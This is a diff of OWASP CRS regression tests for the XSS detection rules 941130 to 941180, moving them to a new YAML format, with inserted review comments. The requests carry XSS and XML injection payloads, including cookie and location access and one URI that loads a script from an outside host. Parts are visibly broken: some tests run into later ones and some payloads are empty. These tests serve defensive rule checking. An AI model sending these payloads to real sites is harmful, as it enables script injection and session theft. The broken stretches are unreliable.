text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=afa" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 8 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=chj" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-9 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=chj" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 9 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=/content.ini'||(select extractvalue(xmltype('%dwusu;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-10 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=/content.ini'||(select extractvalue(xmltype('%dwusu;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 10 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=EmptyValue'||(select extractvalue(xmltype('%awpsd;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-11 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=EmptyValue'||(select extractvalue(xmltype('%awpsd;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 11 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=file:/boot.ini'||(select extractvalue(xmltype('%cwtpc;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-12 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=file:/boot.ini'||(select extractvalue(xmltype('%cwtpc;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 12 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=Matched Data: %awfke;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-13 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=Matched Data: %awfke;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 13 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=oez" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-14 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=oez" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 14 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=(select extractvalue(xmltype('%anwyn;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-15 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=(select extractvalue(xmltype('%anwyn;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 15 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS 
test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-16 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 16 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=2010-01-01'||(select extractvalue(xmltype('%fhklu;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-17 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=2010-01-01'||(select extractvalue(xmltype('%fhklu;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 17 desc: "FP test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post/api/v1/query?q=7XMLNS" - version: HTTP/1.0 - output: - no_log_contains: id "941130" - - test_title: 941130-18 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post/api/v1/query?q=7XMLNS" + version: HTTP/1.0 + output: + log: + no_expect_ids: [941130] + - test_id: 18 desc: "XSS test with encoded newline for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=chj" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-19 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=chj" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 19 desc: "Status Test Page - simple test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - headers: - Host: localhost - User-Agent: "foo!ENTITY % bar SYSTEM" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "941130" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + headers: + Host: localhost + User-Agent: "foo!ENTITY % bar SYSTEM" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml index 6f0599b13..bcebadd21 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml 
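Review bot: Every POST test here (2–16, 18) sends `data:` without a `Content-Type` header, so whether ModSecurity parses the body into ARGS depends entirely on whatever default go-ftw adds; the 941101 tests in this same commit set `Content-Type: application/x-www-form-urlencoded` explicitly, and these should too so the assertion does not hinge on tool defaults. As rendered, tests 5 and 15 both send an empty `data: "var="` and both expect 941130, and test 18 ("XSS test with encoded newline") sends exactly the same `var=chj` as test 8; if payload text was lost in rendering ignore this, otherwise those are duplicates that cannot trigger as written. Test 17 is the only negative case and is labelled `FP test for 941130`; a `desc` naming the query (`q=7XMLNS` must not be read as an XML namespace declaration) would make the regression it guards against explicit.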
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml @@ -1,74 +1,72 @@ --- meta: author: "zmallen, azurit" - enabled: true - name: "941140.yaml" - description: "Tests to trigger, or not trigger 941130" +rule_id: 941140 tests: - - test_title: 941140-1 + - test_id: 1 desc: XSS vectors making use of javascript uri and tags, e.g.,

, in ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '9411400-1=%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E' - version: "HTTP/1.1" - output: - log_contains: id "941140" - - test_title: 941140-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '9411400-1=%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E' + version: "HTTP/1.1" + output: + log: + expect_ids: [941140] + - test_id: 2 desc: XSS vectors making use of javascript uri and tags, e.g.,

, in ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' - version: "HTTP/1.1" - output: - log_contains: id "941140" - - test_title: 941140-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' + version: "HTTP/1.1" + output: + log: + expect_ids: [941140] + - test_id: 3 desc: XSS vectors making use of javascript uri and tags, e.g.,

, in COOKIE stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941140" - - test_title: 941140-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941140] + - test_id: 4 desc: "Status Page Test - x=x:url(javascript as GET variable" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/bar?test=x%3Dx%3Aurl%28javascript" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941140" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/bar?test=x%3Dx%3Aurl%28javascript" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941140] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml index d68a05eea..847216a7e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml 
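Review bot: Test 1 posts its payload under the parameter name `9411400-1` (an extra zero) and test 3's cookie value is `941140-2`, copied from test 2, so the identifiers in the request bodies no longer line up with the `test_id` values the new format introduces; `data: '941140-1=%3Cp%20style…'` and `…%3E=941140-3'` keep them self-describing. The `desc` lines for tests 1–3 read here as `e.g., , in ARGS` — if the example tag survives in the file and was only dropped by rendering ignore this, otherwise the example is missing and the desc should name the vector, e.g. `style="background:url(javascript:…)"`. The removed `meta.description` said "941130", so dropping it also removes a stale copy-paste reference, which is fine.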
@@ -1,41 +1,39 @@ --- meta: author: "zmallen, azurit" - enabled: true - name: "941150.yaml" - description: "Tests to trigger, or not trigger 941150" +rule_id: 941150 tests: - - test_title: 941150-1 + - test_id: 1 desc: Disallowed HTML entities, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941150-1%3D%3Ca%20href%3D%22test%22' - version: "HTTP/1.1" - output: - log_contains: id "941150" - - test_title: 941150-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941150-1%3D%3Ca%20href%3D%22test%22' + version: "HTTP/1.1" + output: + log: + expect_ids: [941150] + - test_id: 2 desc: Disallowed HTML entities, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "payload=XSS" - version: "HTTP/1.1" - output: - log_contains: id "941150" + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "payload=XSS" + version: "HTTP/1.1" + output: + log: + expect_ids: [941150] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml index 3259fd6d9..5f5121ac2 100644 
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml 
@@ -1,267 +1,265 @@ --- meta: author: "csanders-git, Franziska Bühler, Walter Hop, Xhoenix, azurit" - enabled: true - name: "941160.yaml" - description: "Tests to trigger, or not trigger 941160" +rule_id: 941160 tests: - - test_title: 941160-1 + - test_id: 1 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941160" - - test_title: 941160-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941160] + - test_id: 2 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - 
version: "HTTP/1.1" - output: - log_contains: id "941160" - - test_title: 941160-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941160] + - test_id: 3 desc: "just another XSS teststring: " - version: HTTP/1.0 - output: - log_contains: id "941160" - - test_title: 941160-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='\">" + version: HTTP/1.0 + output: + log: + expect_ids: [941160] + - test_id: 15 desc: "SVG onload injection in filename" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php/%3Csvg/onload=alert()" - version: HTTP/1.0 - output: - log_contains: id "941160" - - test_title: 941160-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php/%3Csvg/onload=alert()" + version: HTTP/1.0 + output: + log: + expect_ids: [941160] + - test_id: 16 desc: "Detect XSS injection of 'dialog' tag ('" - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + User-Agent: 
"OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "payload=javascript:/*-->" + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] + - test_id: 3 desc: 'Test first backslash match (javascript:(?:[\s\S]+[=\x5c\(\[\.<]) with: javascript: \\\\t (extra backslashes to work around rule transformations)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?var=javascript:%20%5C%5C%5C%5Ct" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?var=javascript:%20%5C%5C%5C%5Ct" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] + - test_id: 4 desc: 'Test second backslash match (javascript:(?:...|\x5c[ux]\d)) with: javascript:\\\\u0020 (extra backslashes to work around rule transformations)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?var=javascript:%5C%5C%5C%5Cu0020" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-5 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?var=javascript:%5C%5C%5C%5Cu0020" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] + - test_id: 5 desc: "Status Page Test - data: , as GET variable" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?test=%20data%3A%20%2C%20%3Cx%3E" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id 
"941170" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?test=%20data%3A%20%2C%20%3Cx%3E" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml index ba33b770f..a6a7c74f4 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml 
@@ -1,125 +1,123 @@ --- meta: author: "zmallen, azurit" - enabled: true - name: "941180.yaml" - description: "Tests to trigger, or not trigger 941180" +rule_id: 941180 tests: - - test_title: 941180-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941180-1=window.location' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941180-1=window.location' + version: "HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'document.cookie=941180-2' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'document.cookie=941180-2' + version: "HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - 
User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: 'window.location=941180-3' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: 'window.location=941180-3' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 4 desc: Negative test for Node-validator deny list keyword -->, present in stricter sibling 941181, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941180-4=-->' - version: "HTTP/1.1" - output: - no_log_contains: id "941180" - - test_title: 941180-5 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941180-4=-->' + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941180] + - test_id: 5 desc: "XSS with embedded shell execution attempt (batch script)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"-->'-->`-->" - version: HTTP/1.0 - output: - log_contains: id "941180" - - test_title: 941180-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"-->'-->`-->" + version: HTTP/1.0 + output: + log: + expect_ids: [941180] + - test_id: 6 desc: "Node-validator deny list keywords, ARGS, issue #2512" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'arg=...(document.domain)...' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-7 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'arg=...(document.domain)...' + version: "HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 7 desc: "We should not trigger on REQUEST_FILENAME without special characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/javascript-manual/document.cookie" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941180" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/javascript-manual/document.cookie" + headers: + User-Agent: "OWASP CRS test 